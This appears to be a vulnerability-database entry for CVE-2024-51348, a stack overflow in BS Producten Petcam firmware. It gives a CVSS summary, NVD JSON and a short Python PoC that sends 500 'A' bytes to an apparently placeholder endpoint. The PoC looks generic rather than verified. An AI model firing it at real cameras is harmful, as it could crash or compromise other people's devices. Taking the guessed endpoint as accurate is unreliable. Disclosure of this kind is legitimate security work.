CVE-2024-51348

Description

A stack-based buffer overflow vulnerability in the P2P API service in BS Producten Petcam with firmware 33.1.0.0818 allows unauthenticated attackers within network range to overwrite the instruction pointer and achieve Remote Code Execution (RCE) by sending a specially crafted HTTP request.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

BS Producten Petcam firmware 33.1.0.0818

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Target configuration
TARGET_IP = "192.168.1.100"
TARGET_PORT = 80
PAYLOAD = b"A" * 500  # Buffer overflow trigger payload

# Construct malicious HTTP request
# Exploiting the P2P API endpoint vulnerability
request = b"POST /p2p_api_endpoint HTTP/1.1\r\n"
request += b"Host: " + TARGET_IP.encode() + b"\r\n"
request += b"Content-Type: application/x-www-form-urlencoded\r\n"
request += b"Content-Length: " + str(len(PAYLOAD)).encode() + b"\r\n\r\n"
request += PAYLOAD

try:
    # Send payload to trigger stack overflow
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET_IP, TARGET_PORT))
    s.send(request)
    print("Payload sent successfully.")
    s.close()
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-51348
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-51348
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-51348/
[4] VulDB https://vuldb.com/cve/CVE-2024-51348
[5] https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/CVE-2024-51348.md
[6] https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/README.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-51348", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:29.210", "lastModified": "2026-05-19T18:08:17.823", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack-based buffer overflow vulnerability in the P2P API service in BS Producten Petcam with firmware 33.1.0.0818 allows unauthenticated attackers within network range to overwrite the instruction pointer and achieve Remote Code Execution (RCE) by sending a specially crafted HTTP request."}, {"lang": "es", "value": "Una vulnerabilidad de desbordamiento de búfer basado en pila en el servicio API P2P en BS Producten Petcam con firmware 33.1.0.0818 permite a atacantes no autenticados dentro del alcance de la red sobrescribir el puntero de instrucción y lograr Ejecución Remota de Código (RCE) enviando una solicitud HTTP especialmente diseñada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/CVE-2024-51348.md", "source": "[email protected]"}, {"url": "https://github.com/victorGoeman/BS-Producten-Petcam-Security-Research/blob/main/README.md", "source": "[email protected]"}]}}